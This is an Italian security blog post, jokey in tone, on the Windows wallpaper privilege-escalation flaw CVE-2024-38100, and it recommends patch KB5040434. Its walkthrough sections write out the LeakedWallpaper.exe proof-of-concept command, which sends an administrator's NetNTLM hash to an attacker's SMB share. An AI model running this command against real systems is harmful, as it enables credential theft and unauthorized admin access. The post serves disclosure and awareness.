Cyberteam

  • Home
  • Attività
    • Network Security Assessment
    • Password Hacking
      • Password Intelligence
      • Password Security Management
      • Multi-Factor Authentication
    • Cyber Intelligence
    • Vulnerability Assessment
    • NIS 2
    • Penetration Testing
    • Spear Phishing
    • Academy
    • Database Health Check
    • Legal 4 Tech
      • Legal 4 Tech
      • AGID/GDPR
    • Digital Forensics
  • Ethical Hacker
    • chi sono
    • Lavora con noi
  • CT per il sociale
  • Contatti
  • CyberNews

Vulnerabilità Wallpaper Windows:
Quando lo Sfondo ti Frega

Vulnerabilità Wallpaper Windows:
Quando lo Sfondo ti Frega

by Maurizio / mercoledì, 07 Agosto 2024 / Published in Analisi Tecnica, HACKER, Vulnerabilità

Ehi, amministratori dell’IT italiana! Pensavate che il vostro sfondo del desktop fosse innocuo? Ripensateci! Microsoft ci ha appena regalato l’ennesima perla di insicurezza. Benvenuti nel meraviglioso mondo della CVE-2024-38100, dove il vostro wallpaper potrebbe essere la chiave per mandare in vacanza la vostra sicurezza!

Table of Contents

Toggle
  • La Vulnerabilità: Un Biglietto di Sola Andata per i Privilegi Altrui
    • Dettagli Tecnici (per chi non si accontenta delle barzellette)
  • Come Funziona Questa Meraviglia?
    • Esempio Pratico (non provateci a casa, o almeno non fatevi beccare)
  • La Soluzione? Aggiornare (Sorpresa!)
  • Morale della Favola

La Vulnerabilità: Un Biglietto di Sola Andata per i Privilegi Altrui

Immaginate di poter rubare i privilegi di amministratore con la stessa facilità con cui cambiate lo sfondo del desktop. Beh, ora si può! Grazie a questa fantastica falla in Windows File Explorer, anche l’utente più sfigato del sistema può trasformarsi in un super-admin. Chi ha bisogno di skill quando hai le vulnerabilità Microsoft?

Dettagli Tecnici (per chi non si accontenta delle barzellette)

  • CVE-2024-38100: Un nome in codice che fa tremare i polsi agli admin di tutto il mondo.
  • Classificazione: “Importante” secondo Microsoft. Traduzione: “Siamo nella m…a fino al collo”.
  • CVSS Score: 7.8/6.8 – Perché usare un solo numero quando puoi usarne due e confondere tutti?

Come Funziona Questa Meraviglia?

  1. Prendi un utente con meno privilegi di un gatto in una casa di cani.
  2. Aggiungi un pizzico di magia nera chiamata “LeakedWallpaper.exe”.
  3. Mescola il tutto con un comando che sembra scritto da un ubriaco:
   .\LeakedWallpaper.exe <sessione> \\<IP_KALI>\c$\1.jpg
  1. Et voilà! Hai appena rubato l’hash NetNTLM di un account privilegiato. Congratulazioni, sei ufficialmente un “hacker”!

Esempio Pratico (non provateci a casa, o almeno non fatevi beccare)

.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg

Con questo comando magico, trasformi la sessione 1 in un parco giochi per privilegi escalation. L’attaccante (tu, genio del male) usa un account “exploit” per rubare i segreti dell’account “administrator”. È come rubare le caramelle a un bambino, se il bambino fosse Microsoft e le caramelle fossero la sicurezza dei suoi utenti.

La Soluzione? Aggiornare (Sorpresa!)

Microsoft, nella sua infinita saggezza, ha rilasciato la patch KB5040434. Il consiglio? Installatela prima che qualcuno installi voi come nuovi amministratori non autorizzati del sistema.

Morale della Favola

  1. Non fidatevi nemmeno del vostro wallpaper. Potrebbe essere un agente che a il doppio gioco.
  2. Aggiornate Windows come se la vostra vita digitale dipendesse da questo. Perché è così.
  3. Ricordate: in un mondo di lupi hacker, voi siete le pecore. A meno che non siate voi i lupi, nel qual caso… beh, complimenti per aver letto fin qui!

Per ulteriori dettagli su come Microsoft continua a rendere la vita degli hacker più facile (e quella degli admin un inferno), visitate la pagina ufficiale dell’advisory di sicurezza Microsoft. Ma non aspettatevi miracoli: è pur sempre Microsoft di cui stiamo parlando.

Maurizio

Maestro del Caos Digitale e Guardiano del Cyberspazio, naviga nel mare oscuro della sicurezza informatica da oltre vent’anni, armato di codice e un irresistibile papillon.
Con la precisione di un bisturi e l’umorismo di un hacker, ha trasformato centinaia di “comuni mortali IT” in veri e propri ninja dell’Ethical Hacking. La sua missione? Insegnare l’arte della difesa digitale a migliaia di ignare risorse aziendali, un firewall alla volta.
Tre segreti che lo rendono un unicorno nel mondo cyber:

Ha una relazione quasi ossessiva con le password. Alcuni collezionano francobolli, lui colleziona hash crittografici.
Il suo gatto si chiama Hash. Sì, come l’algoritmo. No, non miagola in binario (ancora).
Indossa sempre un papillon, perché chi ha detto che non si può hackerare con stile?

Se lo cercate, seguite la scia di bit verdi: è il suo colore preferito. Perché anche nel mondo digitale, è sempre primavera per la sicurezza!

Condividi
Tagged under: CVE-2024-38100, Microsoft, Vulnerability

What you can read next

Codice dannoso su PyPI: attacco alla catena
di distribuzione delle build notturne di PyTorch
Il malware più ricercato del momento:
Trickbot, Emotet e la piaga di Log4j
SOGIN
Data leak

Categorie

  • AI
  • Analisi Tecnica
  • Attività
  • Cyber Security
  • Dark Web
  • Data Leak
  • GDPR
  • HACKER
  • Industria 4.0
  • IOT
  • MongoDB
  • Password
  • Ransomware
  • Smartworking
  • Vulnerabilità

Recent Posts

  • La Grande Truffa delle Email:
    Quando i Router Diventano Complici

    Ricercatori di sicurezza di Infoblox hanno rece...
  • Microsoft MFA Down:
    Quando la Sicurezza Va in Vacanza

    Microsoft ha avvisato gli utenti di un problema...
  • La paranoia
    è la vera sicurezza

    Siamo all’ultimo articolo di questo spettacolo ...
  • Phishing 2.0:
    come aggirare il 2FA con un sorriso

    Cyberteam vi descrive come il vostro adorato 2F...
  • 2FA:
    Il falso senso di sicurezza

    Oggi parleremo del 2FA, o come mi piace chiamar...
  • GET SOCIAL

© 2024.Tutti i diritti riservati. EURO INFORMATICA SPA - Viale della Repubblica 63/4, 36066 Sandrigo (VI)
P. IVA/CF 02367910243 - Cap Soc. 100.000 Euro i.v. - REA 0226275 - VI - Reg. Imp. 30100-VI-116

COOKIE POLICY - PRIVACY POLICY - DICHIARAZIONE DI ACCESSIBILITA'

TOP
  • Sei sotto attacco?